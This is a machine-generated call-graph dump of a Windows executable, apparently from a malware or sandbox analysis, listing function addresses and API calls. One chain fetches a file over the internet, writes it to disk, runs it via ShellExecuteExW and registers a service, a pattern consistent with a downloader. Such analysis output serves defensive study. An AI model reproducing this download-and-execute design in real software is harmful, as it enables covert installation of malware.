22967 7ff6c7854acf 22966->22967 22968 7ff6c7854adc GetFileAttributesW 22967->22968 22970 7ff6c7854aea 22968->22970 22969 7ff6c785508e 22971 7ff6c785509a GetFileAttributesW 22969->22971 22970->22969 22972 7ff6c785fcd0 30 API calls 22970->22972 22973 7ff6c78550a8 22971->22973 22974 7ff6c78550d3 22971->22974 22976 7ff6c785504d 22972->22976 22973->22974 22977 7ff6c78550ac 22973->22977 22975 7ff6c78550df GetFileAttributesW 22974->22975 22994 7ff6c785512d 22975->22994 23202 7ff6c785cdf0 InternetOpenW InternetOpenUrlW CreateFileW InternetReadFile 22976->23202 22979 7ff6c78550c7 MoveFileW 22977->22979 22978 7ff6c785570b 22983 7ff6c7855721 GetFileAttributesW 22978->22983 22979->22974 23050 7ff6c785572f 22983->23050 22984 7ff6c7856d92 22985 7ff6c785fcd0 30 API calls 22984->22985 22986 7ff6c7856e69 22985->22986 22987 7ff6c7856e76 lstrcmpiW 22986->22987 22988 7ff6c7856e87 22987->22988 22989 7ff6c7856e91 GetCurrentProcessId 22987->22989 23239 7ff6c7857a20 84 API calls 3 library calls 22988->23239 23212 7ff6c7851500 22989->23212 22992 7ff6c7856e8c 23036 7ff6c78578b4 22992->23036 22994->22978 22996 7ff6c785fcd0 30 API calls 22994->22996 22995 7ff6c78578c1 23247 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 22995->23247 23001 7ff6c78556d2 22996->23001 22998 7ff6c78578ce 23248 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 22998->23248 23000 7ff6c78578db 23249 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23000->23249 23005 7ff6c785cdf0 15 API calls 23001->23005 23003 7ff6c78578e8 23250 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23003->23250 23007 7ff6c78556f9 23005->23007 23006 7ff6c78578f5 23251 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23006->23251 23232 7ff6c785cf30 InternetCloseHandle 23007->23232 23010 7ff6c7856ea5 23026 7ff6c785fcd0 30 API calls 23010->23026 23011 7ff6c7857902 23252 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23011->23252 23012 7ff6c78556fe 23233 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23012->23233 23015 7ff6c785790f 23253 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23015->23253 23017 7ff6c785791c 23254 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23017->23254 23019 7ff6c7857929 23255 7ff6c785fe30 28 API calls _invalid_parameter_noinfo_noreturn 23019->23255 23021 7ff6c7857936 23256 7ff6c785fe30 28 API calls _invalid_parameter_noinfo_noreturn 23021->23256 23023 7ff6c7857943 23257 7ff6c78676f0 23023->23257 23025 7ff6c7857954 23072 7ff6c7868580 GetModuleHandleW 23025->23072 23027 7ff6c7857047 23026->23027 23218 7ff6c785fbd0 23027->23218 23029 7ff6c785705b 23030 7ff6c78570b2 ShellExecuteExW 23029->23030 23031 7ff6c785730a StartServiceCtrlDispatcherW 23030->23031 23037 7ff6c78570d0 __vcrt_getptd_noinit 23030->23037 23032 7ff6c785789a 23031->23032 23044 7ff6c785733a 23031->23044 23244 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23032->23244 23034 7ff6c78578a7 23245 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23034->23245 23246 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23036->23246 23240 7ff6c78623b0 52 API calls 2 library calls 23037->23240 23039 7ff6c78572e6 23241 7ff6c785dbc0 52 API calls 5 library calls 23039->23241 23041 7ff6c78572f0 23242 7ff6c78623b0 52 API calls 2 library calls 23041->23242 23043 7ff6c78572fb 23043->23031 23045 7ff6c785fcd0 30 API calls 23044->23045 23046 7ff6c7857878 23045->23046 23223 7ff6c78585f0 RegisterEventSourceW 23046->23223 23050->22984 23051 7ff6c785fcd0 30 API calls 23050->23051 23052 7ff6c78568be 23051->23052 23053 7ff6c785cdf0 15 API calls 23052->23053 23054 7ff6c78568e5 23053->23054 23211 7ff6c785cf30 InternetCloseHandle 23054->23211 23056 7ff6c78568ea 23057 7ff6c785fcd0 30 API calls 23056->23057 23058 7ff6c7856aab 23057->23058 23059 7ff6c7856b11 ShellExecuteExW 23058->23059 23060 7ff6c7856d5f WaitForSingleObject CloseHandle 23059->23060 23064 7ff6c7856b32 __vcrt_getptd_noinit 23059->23064 23237 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23060->23237 23062 7ff6c7856d85 23238 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23062->23238 23234 7ff6c78623b0 52 API calls 2 library calls 23064->23234 23066 7ff6c7856d3b 23235 7ff6c785dbc0 52 API calls 5 library calls 23066->23235 23068 7ff6c7856d45 23236 7ff6c78623b0 52 API calls 2 library calls 23068->23236 23070 7ff6c7856d50 23070->23060 23071->22909 23072->22916 23073->22919 23074->22902 23075->22905 23076->22908 23077->22923 23079 7ff6c7877325 23078->23079 23086 7ff6c7877321 23078->23086 23092 7ff6c788447c GetEnvironmentStringsW 23079->23092 23082 7ff6c7877332 23084 7ff6c787b1d8 __free_lconv_num 6 API calls 23082->23084 23083 7ff6c787733e 23099 7ff6c787748c 28 API calls 4 library calls 23083->23099 23084->23086 23086->22931 23091 7ff6c78776cc 7 API calls 3 library calls 23086->23091 23087 7ff6c7877346 23088 7ff6c787b1d8 __free_lconv_num 6 API calls 23087->23088 23089 7ff6c7877365 23088->23089 23090 7ff6c787b1d8 __free_lconv_num 6 API calls 23089->23090 23090->23086 23091->22931 23093 7ff6c787732a 23092->23093 23094 7ff6c78844a0 23092->23094 23093->23082 23093->23083 23100 7ff6c787cf68 7 API calls 2 library calls 23094->23100 23096 7ff6c78844d7 _Yarn 23097 7ff6c787b1d8 __free_lconv_num 6 API calls 23096->23097 23098 7ff6c78844f7 FreeEnvironmentStringsW 23097->23098 23098->23093 23099->23087 23100->23096 23102 7ff6c785feb0 23101->23102 23102->23102 23264 7ff6c78629a0 23102->23264 23104 7ff6c785febe 23104->22935 23310 7ff6c787e8fc 23105->23310 23108 7ff6c7873554 23110 7ff6c7873559 23108->23110 23111 7ff6c7873583 23108->23111 23109 7ff6c7873642 23313 7ff6c7874aa8 11 API calls _invalid_parameter_noinfo_noreturn 23109->23313 23113 7ff6c7873566 23110->23113 23129 7ff6c78735d0 23110->23129 23117 7ff6c7874bc4 _set_fmode 6 API calls 23111->23117 23111->23129 23116 7ff6c787f474 31 API calls 23113->23116 23115 7ff6c787b1d8 __free_lconv_num 6 API calls 23137 7ff6c7873578 23115->23137 23118 7ff6c787356d 23116->23118 23119 7ff6c78735a8 23117->23119 23121 7ff6c787b1d8 __free_lconv_num 6 API calls 23118->23121 23122 7ff6c7874bc4 _set_fmode 6 API calls 23119->23122 23120 7ff6c78676f0 codecvt 4 API calls 23123 7ff6c7873630 23120->23123 23121->23137 23124 7ff6c78735af 23122->23124 23123->22937 23125 7ff6c78735cb 23124->23125 23126 7ff6c78735d4 23124->23126 23127 7ff6c7874bc4 _set_fmode 6 API calls 23125->23127 23128 7ff6c7874bc4 _set_fmode 6 API calls 23126->23128 23127->23129 23130 7ff6c78735d9 23128->23130 23129->23115 23131 7ff6c78735f6 23130->23131 23132 7ff6c7874bc4 _set_fmode 6 API calls 23130->23132 23133 7ff6c7874bc4 _set_fmode 6 API calls 23131->23133 23134 7ff6c78735e3 23132->23134 23133->23129 23134->23131 23135 7ff6c78735e8 23134->23135 23136 7ff6c787b1d8 __free_lconv_num 6 API calls 23135->23136 23136->23137 23137->23120 23141 7ff6c785fd01 23138->23141 23142 7ff6c785fe0b 23141->23142 23143 7ff6c785fd6d 23141->23143 23144 7ff6c785fdc1 23141->23144 23146 7ff6c785fd29 _Yarn 23141->23146 23147 7ff6c785fe11 23141->23147 23337 7ff6c7851440 30 API calls 2 library calls 23142->23337 23143->23142 23149 7ff6c78679bc std::_Facet_Register 30 API calls 23143->23149 23148 7ff6c78679bc std::_Facet_Register 30 API calls 23144->23148 23146->22941 23338 7ff6c78514e0 30 API calls 23147->23338 23148->23146 23150 7ff6c785fd82 23149->23150 23150->23146 23336 7ff6c7874a78 28 API calls 2 library calls 23150->23336 23153 7ff6c78679bc std::_Facet_Register 30 API calls 23152->23153 23154 7ff6c785f62a 23153->23154 23339 7ff6c78650dc 23154->23339 23158 7ff6c785f657 23159 7ff6c785f675 23158->23159 23163 7ff6c785f8e8 23158->23163 23160 7ff6c78679bc std::_Facet_Register 30 API calls 23159->23160 23161 7ff6c785f6f5 23160->23161 23162 7ff6c78650dc 34 API calls 23161->23162 23164 7ff6c785f6ff 23162->23164 23378 7ff6c7852660 23163->23378 23368 7ff6c7866c78 23164->23368 23168 7ff6c785f789 23376 7ff6c786d8bc 28 API calls 2 library calls 23168->23376 23172 7ff6c785f7f7 _RTC_Initialize 23377 7ff6c7862740 50 API calls 5 library calls 23172->23377 23173 7ff6c785f8b9 23175 7ff6c7852660 52 API calls 23173->23175 23179 7ff6c785f85c _RTC_Initialize 23173->23179 23176 7ff6c785f97d 23175->23176 23177 7ff6c78695e4 Concurrency::cancel_current_task 2 API calls 23176->23177 23178 7ff6c785f98e 23177->23178 23179->22960 23181 7ff6c78620d0 23180->23181 23182 7ff6c7861c30 52 API calls 23181->23182 23183 7ff6c7862140 _RTC_Initialize 23181->23183 23182->23183 23184 7ff6c7852660 52 API calls 23183->23184 23185 7ff6c7862358 23184->23185 23186 7ff6c78695e4 Concurrency::cancel_current_task 2 API calls 23185->23186 23187 7ff6c7862369 23186->23187 23188 7ff6c7861ef0 55 API calls 23187->23188 23189 7ff6c786238a 23188->23189 23629 7ff6c78643e0 23189->23629 23191 7ff6c7862395 23641 7ff6c7861c30 23191->23641 23193 7ff6c7852eb1 23193->22965 23659 7ff6c7861220 23194->23659 23196 7ff6c7852ed8 23230 7ff6c785f4b0 49 API calls 23196->23230 23197 7ff6c785f422 23197->23196 23198 7ff6c7852660 52 API calls 23197->23198 23199 7ff6c785f496 23198->23199 23200 7ff6c78695e4 Concurrency::cancel_current_task 2 API calls 23199->23200 23201 7ff6c785f4a7 23200->23201 23203 7ff6c785ce9b 23202->23203 23204 7ff6c785ceed CloseHandle 23202->23204 23203->23204 23206 7ff6c785cf1b 23203->23206 23209 7ff6c785ceb8 WriteFile InternetReadFile 23203->23209 23205 7ff6c78676f0 codecvt 4 API calls 23204->23205 23207 7ff6c7855074 InternetCloseHandle 23205->23207 23676 7ff6c7867824 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind std::_Locinfo::_Locinfo_ctor 23206->23676 23231 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23207->23231 23209->23203 23209->23204 23210 7ff6c785cf20 23211->23056 23213 7ff6c7851530 23212->23213 23213->23213 23677 7ff6c7864900 23213->23677 23215 7ff6c7851570 23216 7ff6c78676f0 codecvt 4 API calls 23215->23216 23217 7ff6c7851580 23216->23217 23217->23010 23219 7ff6c785fbe3 23218->23219 23222 7ff6c785fbfd _Yarn 23219->23222 23694 7ff6c78637b0 30 API calls 4 library calls 23219->23694 23221 7ff6c785fc54 23221->23029 23222->23029 23224 7ff6c7858629 __vcrt_getptd_noinit 23223->23224 23225 7ff6c78586a3 23223->23225 23695 7ff6c7851210 30 API calls 23224->23695 23226 7ff6c78676f0 codecvt 4 API calls 23225->23226 23227 7ff6c785788d 23226->23227 23243 7ff6c785fc60 28 API calls _invalid_parameter_noinfo_noreturn 23227->23243 23229 7ff6c785864c ReportEventW DeregisterEventSource 23229->23225 23230->22943 23231->22969 23232->23012 23233->22978 23234->23066 23235->23068 23236->23070 23237->23062 23238->22984 23239->22992 23240->23039 23241->23041 23242->23043 23243->23032 23244->23034 23245->23036 23246->22995 23247->22998 23248->23000 23249->23003 23250->23006 23251->23011 23252->23015 23253->23017 23254->23019 23255->23021 23256->23023 23258 7ff6c78676f9 23257->23258 23259 7ff6c7867750 IsProcessorFeaturePresent 23258->23259 23260 7ff6c7867704 23258->23260 23261 7ff6c7867768 23259->23261 23260->23025 23696 7ff6c7867948 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 23261->23696 23263 7ff6c786777b 23263->23025 23265 7ff6c7862aa7 23264->23265 23267 7ff6c78629d1 23264->23267 23307 7ff6c78514e0 30 API calls 23265->23307 23268 7ff6c78629d7 _Yarn 23267->23268 23269 7ff6c7862a5c 23267->23269 23270 7ff6c7862a03 23267->23270 23268->23104 23273 7ff6c78679bc std::_Facet_Register 30 API calls 23269->23273 23272 7ff6c7862aa1 23270->23272 23298 7ff6c78679bc 23270->23298 23306 7ff6c7851440 30 API calls 2 library calls 23272->23306 23273->23268 23274 7ff6c7862a19 23274->23268 23305 7ff6c7874a78 28 API calls 2 library calls 23274->23305 23300 7ff6c78679c7 std::_Facet_Register 23298->23300 23299 7ff6c78679e0 23299->23274 23300->23299 23301 7ff6c78679f1 23300->23301 23308 7ff6c7864eb4 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 23300->23308 23309 7ff6c7851440 30 API calls 2 library calls 23301->23309 23304 7ff6c78679f7 23304->23274 23306->23265 23309->23304 23314 7ff6c787e77c 23310->23314 23312 7ff6c787354b 23312->23108 23312->23109 23317 7ff6c787e7a8 23314->23317 23315 7ff6c787e7b0 23316 7ff6c7874bc4 _set_fmode 6 API calls 23315->23316 23319 7ff6c787e7b5 23316->23319 23317->23315 23318 7ff6c787e7d3 23317->23318 23333 7ff6c787e870 47 API calls 23318->23333 23332 7ff6c7874a58 28 API calls _invalid_parameter_noinfo 23319->23332 23322 7ff6c787e7c1 23322->23312 23323 7ff6c787e7db 23323->23322 23324 7ff6c787e819 23323->23324 23325 7ff6c787e809 23323->23325 23334 7ff6c7879a04 28 API calls 2 library calls 23324->23334 23326 7ff6c7874bc4 _set_fmode 6 API calls 23325->23326 23326->23322 23328 7ff6c787e827 23328->23322 23329 7ff6c787e85a 23328->23329 23335 7ff6c7874aa8 11 API calls _invalid_parameter_noinfo_noreturn 23329->23335 23332->23322 23333->23323 23334->23328 23337->23147 23395 7ff6c7864c5c 23339->23395 23341 7ff6c78650fe 23347 7ff6c7865121 _Yarn _RTC_Initialize 23341->23347 23403 7ff6c78652d4 30 API calls std::_Facet_Register 23341->23403 23343 7ff6c7865116 23404 7ff6c7865304 29 API calls std::locale::_Setgloballocale 23343->23404 23346 7ff6c785f634 23348 7ff6c7861ef0 23346->23348 23347->23347 23399 7ff6c7864cd4 23347->23399 23349 7ff6c7861f21 _RTC_Initialize 23348->23349 23350 7ff6c7864c5c std::_Lockit::_Lockit 2 API calls 23349->23350 23351 7ff6c7861f2e 23350->23351 23352 7ff6c7864c5c std::_Lockit::_Lockit 2 API calls 23351->23352 23355 7ff6c7861f7d 23351->23355 23353 7ff6c7861f53 23352->23353 23356 7ff6c7864cd4 std::_Lockit::~_Lockit RtlLeaveCriticalSection 23353->23356 23354 7ff6c7864cd4 std::_Lockit::~_Lockit RtlLeaveCriticalSection 23365 7ff6c7862018 _RTC_Initialize 23354->23365 23364 7ff6c7861fc7 _RTC_Initialize 23355->23364 23406 7ff6c7851d40 55 API calls 6 library calls 23355->23406 23356->23355 23358 7ff6c7861fdb 23359 7ff6c7861fe5 23358->23359 23360 7ff6c786206f 23358->23360 23407 7ff6c786509c 30 API calls std::_Facet_Register 23359->23407 23408 7ff6c7851b10 30 API calls 2 library calls 23360->23408 23363 7ff6c7862074 23409 7ff6c7864ef8 30 API calls Concurrency::cancel_current_task 23363->23409 23364->23354 23365->23158 23369 7ff6c7866cbe 23368->23369 23372 7ff6c785f77d 23369->23372 23410 7ff6c7875868 23369->23410 23372->23168 23372->23173 23374 7ff6c7866d0c 23374->23372 23430 7ff6c786de30 23374->23430 23376->23172 23377->23179 23379 7ff6c78526a0 23378->23379 23379->23379 23380 7ff6c78629a0 52 API calls 23379->23380 23381 7ff6c78526b4 23380->23381 23596 7ff6c7851670 23381->23596 23384 7ff6c7852702 23385 7ff6c78676f0 codecvt 4 API calls 23384->23385 23387 7ff6c7852721 23385->23387 23386 7ff6c785272c 23621 7ff6c7874a78 28 API calls 2 library calls 23386->23621 23390 7ff6c78695e4 23387->23390 23393 7ff6c7869603 _RTC_Initialize 23390->23393 23391 7ff6c786962c RtlPcToFileHeader 23394 7ff6c7869644 23391->23394 23392 7ff6c786964e RaiseException 23392->23173 23393->23391 23393->23392 23394->23392 23396 7ff6c7864c6b 23395->23396 23397 7ff6c7864c70 23395->23397 23405 7ff6c7874cb4 RtlEnterCriticalSection GetProcAddress std::_Lockit::_Lockit 23396->23405 23397->23341 23400 7ff6c7864cdf RtlLeaveCriticalSection 23399->23400 23402 7ff6c7864ce8 23399->23402 23402->23346 23403->23343 23404->23347 23406->23358 23407->23364 23408->23363 23411 7ff6c78757ac 23410->23411 23412 7ff6c78757c9 23411->23412 23415 7ff6c78757f5 23411->23415 23413 7ff6c7874bc4 _set_fmode 6 API calls 23412->23413 23414 7ff6c78757ce 23413->23414 23447 7ff6c7874a58 28 API calls _invalid_parameter_noinfo 23414->23447 23417 7ff6c78757fa 23415->23417 23418 7ff6c7875807 23415->23418 23420 7ff6c7874bc4 _set_fmode 6 API calls 23417->23420 23438 7ff6c787ce08 23418->23438 23419 7ff6c7866cf1 23419->23372 23429 7ff6c7874638 44 API calls ProcessCodePage 23419->23429 23420->23419 23422 7ff6c7875811 23423 7ff6c787581b 23422->23423 23424 7ff6c7875828 23422->23424 23425 7ff6c7874bc4 _set_fmode 6 API calls 23423->23425 23442 7ff6c7881edc 23424->23442 23425->23419 23427 7ff6c787583c 23448 7ff6c786d910 RtlLeaveCriticalSection 23427->23448 23429->23374 23431 7ff6c786de60 23430->23431 23582 7ff6c786dd0c 23431->23582 23433 7ff6c786de79 23435 7ff6c786de9e 23433->23435 23592 7ff6c786d5f4 28 API calls 3 library calls 23433->23592 23437 7ff6c786deb3 23435->23437 23593 7ff6c786d5f4 28 API calls 3 library calls 23435->23593 23437->23372 23439 7ff6c787ce1f 23438->23439 23449 7ff6c787ce7c 23439->23449 23441 7ff6c787ce2a 23441->23422 23466 7ff6c7881c18 23442->23466 23446 7ff6c7881f36 23446->23427 23447->23419 23452 7ff6c787cead 23449->23452 23450 7ff6c787cefc 23451 7ff6c787b160 _set_fmode 6 API calls 23450->23451 23453 7ff6c787cf09 23451->23453 23452->23450 23457 7ff6c787cf46 23452->23457 23462 7ff6c786d904 RtlEnterCriticalSection 23452->23462 23463 7ff6c786d910 RtlLeaveCriticalSection 23452->23463 23455 7ff6c787b1d8 __free_lconv_num 6 API calls 23453->23455 23456 7ff6c787cf13 23455->23456 23456->23457 23464 7ff6c787b7d4 GetProcAddress __crtLCMapStringW __vcrt_InitializeCriticalSectionEx 23456->23464 23457->23441 23460 7ff6c787cf33 23465 7ff6c786d904 RtlEnterCriticalSection 23460->23465 23464->23460 23472 7ff6c7881c42 23466->23472 23467 7ff6c7881df5 23468 7ff6c7874bc4 _set_fmode 6 API calls 23467->23468 23471 7ff6c7881dfe 23467->23471 23469 7ff6c7881ebb 23468->23469 23484 7ff6c7874a58 28 API calls _invalid_parameter_noinfo 23469->23484 23471->23446 23478 7ff6c788ad34 23471->23478 23472->23467 23481 7ff6c788a4bc 28 API calls 3 library calls 23472->23481 23474 7ff6c7881e56 23474->23467 23482 7ff6c788a4bc 28 API calls 3 library calls 23474->23482 23476 7ff6c7881e77 23476->23467 23483 7ff6c788a4bc 28 API calls 3 library calls 23476->23483 23485 7ff6c788a608 23478->23485 23480 7ff6c788ad61 23480->23446 23481->23474 23482->23476 23483->23467 23484->23471 23486 7ff6c788a61f 23485->23486 23487 7ff6c788a63d 23485->23487 23488 7ff6c7874bc4 _set_fmode 6 API calls 23486->23488 23487->23486 23490 7ff6c788a659 23487->23490 23489 7ff6c788a624 23488->23489 23503 7ff6c7874a58 28 API calls _invalid_parameter_noinfo 23489->23503 23494 7ff6c788ac18 23490->23494 23493 7ff6c788a630 23493->23480 23495 7ff6c7876178 TranslateName 28 API calls 23494->23495 23496 7ff6c788ac6b 23495->23496 23497 7ff6c7876af4 8 API calls 23496->23497 23498 7ff6c788acd3 23497->23498 23499 7ff6c788acd7 23498->23499 23504 7ff6c788ad68 23498->23504 23501 7ff6c788ad14 23499->23501 23502 7ff6c787b1d8 __free_lconv_num 6 API calls 23499->23502 23501->23493 23502->23501 23503->23493 23547 7ff6c788a94c 23504->23547 23507 7ff6c788adf5 23567 7ff6c788506c 23507->23567 23508 7ff6c788addd 23510 7ff6c7874ba4 _fread_nolock 6 API calls 23508->23510 23512 7ff6c788ade2 23510->23512 23511 7ff6c788adfa 23513 7ff6c788ae01 23511->23513 23514 7ff6c788ae1a CreateFileW 23511->23514 23518 7ff6c7874bc4 _set_fmode 6 API calls 23512->23518 23515 7ff6c7874ba4 _fread_nolock 6 API calls 23513->23515 23516 7ff6c788af00 GetFileType 23514->23516 23517 7ff6c788ae85 23514->23517 23521 7ff6c788ae06 23515->23521 23519 7ff6c788af5e 23516->23519 23520 7ff6c788af0d __vcrt_getptd_noinit 23516->23520 23522 7ff6c788aecd __vcrt_getptd_noinit 23517->23522 23524 7ff6c788ae93 CreateFileW 23517->23524 23539 7ff6c788adee 23518->23539 23576 7ff6c7884f84 7 API calls 2 library calls 23519->23576 23575 7ff6c7874b38 6 API calls 2 library calls 23520->23575 23523 7ff6c7874bc4 _set_fmode 6 API calls 23521->23523 23574 7ff6c7874b38 6 API calls 2 library calls 23522->23574 23523->23512 23524->23516 23524->23522 23528 7ff6c788af80 23530 7ff6c788afd4 23528->23530 23577 7ff6c788ab54 47 API calls 2 library calls 23528->23577 23529 7ff6c788af1c CloseHandle 23529->23512 23531 7ff6c788af4e 23529->23531 23537 7ff6c788afdb 23530->23537 23579 7ff6c788a6cc 46 API calls 3 library calls 23530->23579 23533 7ff6c7874bc4 _set_fmode 6 API calls 23531->23533 23535 7ff6c788af53 23533->23535 23535->23512 23536 7ff6c788b012 23536->23537 23538 7ff6c788b021 23536->23538 23578 7ff6c787cca0 30 API calls ProcessCodePage 23537->23578 23538->23539 23541 7ff6c788b0a0 CloseHandle CreateFileW 23538->23541 23539->23499 23542 7ff6c788b0e7 __vcrt_getptd_noinit 23541->23542 23543 7ff6c788b115 23541->23543 23580 7ff6c7874b38 6 API calls 2 library calls 23542->23580 23543->23539 23545 7ff6c788b0f4 23581 7ff6c78851ac 7 API calls 2 library calls 23545->23581 23548 7ff6c788a978 23547->23548 23556 7ff6c788a992 23547->23556 23549 7ff6c7874bc4 _set_fmode 6 API calls 23548->23549 23548->23556 23550 7ff6c788a987 23549->23550 23551 7ff6c7874a58 _invalid_parameter_noinfo 28 API calls 23550->23551 23551->23556 23552 7ff6c788aa61 23554 7ff6c7877960 28 API calls 23552->23554 23563 7ff6c788aabe 23552->23563 23553 7ff6c788aa10 23553->23552 23555 7ff6c7874bc4 _set_fmode 6 API calls 23553->23555 23557 7ff6c788aaba 23554->23557 23558 7ff6c788aa56 23555->23558 23556->23553 23559 7ff6c7874bc4 _set_fmode 6 API calls 23556->23559 23560 7ff6c788ab3c 23557->23560 23557->23563 23561 7ff6c7874a58 _invalid_parameter_noinfo 28 API calls 23558->23561 23562 7ff6c788aa05 23559->23562 23564 7ff6c7874aa8 _invalid_parameter_noinfo_noreturn 11 API calls 23560->23564 23561->23552 23565 7ff6c7874a58 _invalid_parameter_noinfo 28 API calls 23562->23565 23563->23507 23563->23508 23566 7ff6c788ab51 23564->23566 23565->23553 23571 7ff6c788508f 23567->23571 23568 7ff6c78850bd 23568->23511 23569 7ff6c78850b8 23570 7ff6c7884dbc 7 API calls 23569->23570 23570->23568 23571->23568 23571->23569 23572 7ff6c788510e RtlEnterCriticalSection 23571->23572 23572->23568 23573 7ff6c788511d RtlLeaveCriticalSection 23572->23573 23573->23571 23574->23512 23575->23529 23576->23528 23577->23530 23578->23539 23579->23536 23580->23545 23581->23543 23583 7ff6c786dd27 23582->23583 23584 7ff6c786dd55 23582->23584 23595 7ff6c787498c 28 API calls 2 library calls 23583->23595 23586 7ff6c786dd47 23584->23586 23594 7ff6c786d904 RtlEnterCriticalSection 23584->23594 23586->23433 23588 7ff6c786dd6c 23589 7ff6c786dd88 43 API calls 23588->23589 23590 7ff6c786dd78 23589->23590 23591 7ff6c786d910 _fread_nolock RtlLeaveCriticalSection 23590->23591 23591->23586 23592->23435 23593->23437 23595->23586 23598 7ff6c78516bb 23596->23598 23600 7ff6c7851700 23598->23600 23602 7ff6c7851765 23598->23602 23609 7ff6c78516db _Yarn 23598->23609 23613 7ff6c7851913 23598->23613 23599 7ff6c7851919 23628 7ff6c7874a78 28 API calls 2 library calls 23599->23628 23605 7ff6c78679bc std::_Facet_Register 30 API calls 23600->23605 23615 7ff6c785190d 23600->23615 23601 7ff6c78517b4 _RTC_Initialize 23623 7ff6c7861370 30 API calls _Yarn 23601->23623 23606 7ff6c78679bc std::_Facet_Register 30 API calls 23602->23606 23605->23609 23606->23609 23608 7ff6c7851908 23625 7ff6c7874a78 28 API calls 2 library calls 23608->23625 23609->23601 23609->23608 23622 7ff6c7861370 30 API calls _Yarn 23609->23622 23612 7ff6c78517f8 23612->23599 23624 7ff6c786939c 28 API calls 2 library calls 23612->23624 23627 7ff6c78514e0 30 API calls 23613->23627 23626 7ff6c7851440 30 API calls 2 library calls 23615->23626 23617 7ff6c7851894 23617->23608 23618 7ff6c78518d0 23617->23618 23619 7ff6c78676f0 codecvt 4 API calls 23618->23619 23620 7ff6c78518f6 23619->23620 23620->23384 23620->23386 23622->23601 23623->23612 23624->23617 23626->23613 23630 7ff6c7864411 _RTC_Initialize 23629->23630 23631 7ff6c7861c30 52 API calls 23630->23631 23632 7ff6c786442d _RTC_Initialize 23630->23632 23631->23632 23633 7ff6c7864542 23632->23633 23635 7ff6c7864506 23632->23635 23637 7ff6c7852660 52 API calls 23633->23637 23634 7ff6c7864517 _RTC_Initialize 23634->23191 23635->23634 23653 7ff6c7861d70 52 API calls 2 library calls 23635->23653 23638 7ff6c7864584 23637->23638 23639 7ff6c78695e4 Concurrency::cancel_current_task 2 API calls 23638->23639 23640 7ff6c7864595 23639->23640 23642 7ff6c7861c54 23641->23642 23643 7ff6c7861ce9 _RTC_Initialize 23641->23643 23654 7ff6c7860f70 23642->23654 23643->23193 23645 7ff6c7861c61 _RTC_Initialize 23646 7ff6c7861cd6 23645->23646 23648 7ff6c7861d19 23645->23648 23646->23643 23658 7ff6c7861d70 52 API calls 2 library calls 23646->23658 23649 7ff6c7852660 52 API calls 23648->23649 23650 7ff6c7861d5b 23649->23650 23651 7ff6c78695e4 Concurrency::cancel_current_task 2 API calls 23650->23651 23652 7ff6c7861d6c 23651->23652 23653->23634 23656 7ff6c7860f99 _RTC_Initialize 23654->23656 23655 7ff6c7860fb5 23655->23645 23656->23655 23657 7ff6c7861c30 52 API calls 23656->23657 23657->23655 23658->23643 23660 7ff6c7861290 23659->23660 23661 7ff6c7861240 23659->23661 23660->23197 23665 7ff6c7861120 23661->23665 23663 7ff6c786127a 23664 7ff6c786de30 45 API calls 23663->23664 23664->23660 23666 7ff6c7861143 23665->23666 23667 7ff6c7861200 23665->23667 23666->23667 23672 7ff6c786114d _RTC_Initialize 23666->23672 23668 7ff6c78676f0 codecvt 4 API calls 23667->23668 23669 7ff6c786120f 23668->23669 23669->23663 23670 7ff6c786119f 23671 7ff6c78676f0 codecvt 4 API calls 23670->23671 23673 7ff6c78611bc 23671->23673 23672->23670 23675 7ff6c78739fc 47 API calls ProcessCodePage 23672->23675 23673->23663 23675->23670 23676->23210 23680 7ff6c7864948 23677->23680 23689 7ff6c7864937 _Yarn 23677->23689 23678 7ff6c7864a4f 23693 7ff6c78514e0 30 API calls 23678->23693 23680->23678 23682 7ff6c7864a49 23680->23682 23684 7ff6c78649ab 23680->23684 23685 7ff6c78649ff 23680->23685 23680->23689 23692 7ff6c7851440 30 API calls 2 library calls 23682->23692 23684->23682 23687 7ff6c78679bc std::_Facet_Register 30 API calls 23684->23687 23686 7ff6c78679bc std::_Facet_Register 30 API calls 23685->23686 23686->23689 23688 7ff6c78649c0 23687->23688 23688->23689 23691 7ff6c7874a78 28 API calls 2 library calls 23688->23691 23689->23215 23692->23678 23694->23221 23695->23229 23696->23263 23867 7ff6c7884518 52 API calls 7 library calls 23946 7ff6c786d720 7 API calls 2 library calls 23868 7ff6c787b120 7 API calls 23869 7ff6c785e920 39 API calls 5 library calls 23972 7ff6c785e620 47 API calls 23870 7ff6c7867c4a 5 API calls BuildCatchObjectHelperInternal 23947 7ff6c788ba50 42 API calls 23871 7ff6c7887c50 GetProcessHeap 23911 7ff6c788eb4c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 23976 7ff6c7886940 30 API calls 5 library calls 23914 7ff6c7851340 28 API calls __std_exception_copy 23915 7ff6c7852340 LCMapStringEx __crtLCMapStringW 23875 7ff6c7865040 RtlLeaveCriticalSection RtlEnterCriticalSection GetProcAddress _Yarn 23916 7ff6c785ef40 48 API calls 2 library calls 23876 7ff6c787e468 34 API calls 3 library calls 23697 7ff6c786d275 23709 7ff6c78799d8 23697->23709 23699 7ff6c786d27a 23700 7ff6c786d2eb 23699->23700 23701 7ff6c786d2a1 GetModuleHandleW 23699->23701 23702 7ff6c786d178 6 API calls 23700->23702 23701->23700 23707 7ff6c786d2ae 23701->23707 23703 7ff6c786d327 23702->23703 23704 7ff6c786d32e 23703->23704 23705 7ff6c786d344 GetCurrentProcess TerminateProcess ExitProcess GetModuleHandleExW GetProcAddress 23703->23705 23706 